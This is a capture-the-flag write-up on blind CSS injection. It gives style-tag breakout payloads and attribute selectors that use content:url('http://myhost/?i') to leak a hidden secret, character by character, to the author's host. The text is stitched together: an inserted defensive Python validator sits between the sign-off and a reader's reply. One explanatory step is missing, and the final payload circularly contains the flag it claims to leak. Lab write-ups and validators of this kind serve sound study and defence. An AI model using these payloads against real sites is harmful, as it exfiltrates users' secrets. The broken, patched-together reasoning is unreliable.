Challenge:
The challenge is about CSS injection. When you click "Share your button!", the page sends a POST request to push.php with a body like this:
csscode={width:+100px;+font-size:+100px;+height:+1px;+line-height:+1px;+border-width:+1px;}&submit=Share+your+button!
Wow, it's CSS! I changed the content inside {} to check:
csscode={color:red;}&submit=Share+your+button!
The color of the text turns red.
Let’s view the source code:
Notice 1:
<style>#button {color:red}</style>
So our input is placed after #button. Let's try an injection and see whether it has any effect:
csscode=</style><style>#button {color:yellow;}&submit=Share+your+button!
Well, the text color turns yellow.
Notice 2:
<!-- Admin only ...
<span value="secret"></span>
-->
Obviously, we need to leak “secret”, which is the flag of this challenge. How?
Let me talk about CSS.
CSS stands for Cascading Style Sheets and it’s used to customize how websites look.
Here is the CSS syntax:
selector { property1: value1; property2: value2; }
So if we want to style the span tag, we just write:
span { color:red }
But how do we select the value attribute? Here is the solution:
So our payload becomes:
span[value]{color:red}
I decided to use a trick called blind CSS injection:
span[value$='1']{content: url('http://myhost/?i')}
If the last character of “secret” is ‘1’, the browser loads my host and I’ll know; if not, nothing happens.
Moving on:
span[value$='41']{content: url('http://myhost/?i')}
If the last two characters of “secret” are ’41’, the browser loads my host and I’ll know; if not, nothing happens.
Combining the two notices, the final payload is:
csscode=</style><style>span[value='662f32aeb6041954dfac4a83523bc3eae72b5441'] {content: url('http://myhost/?i')}&submit=Share%2Byour%2Bbutton!
Flag: 662f32aeb6041954dfac4a83523bc3eae72b5441
Sorry for my bad engrish
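The defensive counterpart to the injection above, as an added example that is not part of the original write-up or the challenge's code: a server-side validator that parses csscode as a single declaration block and rebuilds the #button rule from an allowlist, so neither the </style> breakout nor the span[value$=...] selector reaches the page. The allowlist, the value patterns and the function names are assumptions.

```python
import re

# Assumed allowlist: the properties seen in the page's sample request, plus color.
LENGTH = re.compile(r"\d{1,4}(?:px|em|%)")
COLOR = re.compile(r"#[0-9a-fA-F]{3}(?:[0-9a-fA-F]{3})?|[a-zA-Z]{3,20}")
ALLOWED = {
    "width": LENGTH, "height": LENGTH, "font-size": LENGTH,
    "line-height": LENGTH, "border-width": LENGTH, "color": COLOR,
}

def sanitize_button_css(csscode: str) -> str:
    """Return a rebuilt '#button {...}' rule, or raise ValueError."""
    body = csscode.strip()
    if not (body.startswith("{") and body.endswith("}")):
        raise ValueError("expected a single {...} declaration block")
    declarations = []
    for decl in body[1:-1].split(";"):
        if not decl.strip():
            continue  # tolerate a trailing ';'
        prop, sep, value = decl.partition(":")
        prop, value = prop.strip().lower(), value.strip()
        pattern = ALLOWED.get(prop)
        # Unknown property, missing ':' or a value that is not a plain
        # length/color (url(), quotes, tags, braces) is rejected outright.
        if not sep or pattern is None or not pattern.fullmatch(value):
            raise ValueError(f"rejected declaration: {decl.strip()!r}")
        declarations.append(f"{prop}: {value}")
    # Output is rebuilt from validated tokens; raw input is never echoed.
    return "#button {" + "; ".join(declarations) + "}"

def is_accepted(csscode: str) -> bool:
    try:
        sanitize_button_css(csscode)
        return True
    except ValueError:
        return False

# Constructed inputs: the form values shown on this page, after URL decoding.
BENIGN = "{width: 100px; font-size: 100px; height: 1px; line-height: 1px; border-width: 1px;}"
BREAKOUT = "</style><style>#button {color:yellow;}"
SELECTOR = "</style><style>span[value$='1']{content: url('http://myhost/?i')}"

if __name__ == "__main__":
    for sample in (BENIGN, BREAKOUT, SELECTOR):
        print(is_accepted(sample), sample)
```

Because the rule is rebuilt from validated property/value pairs, the selector is always #button and the <style> element can never be closed by user input.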
Ok, I forgive your engrish.
thank u 😥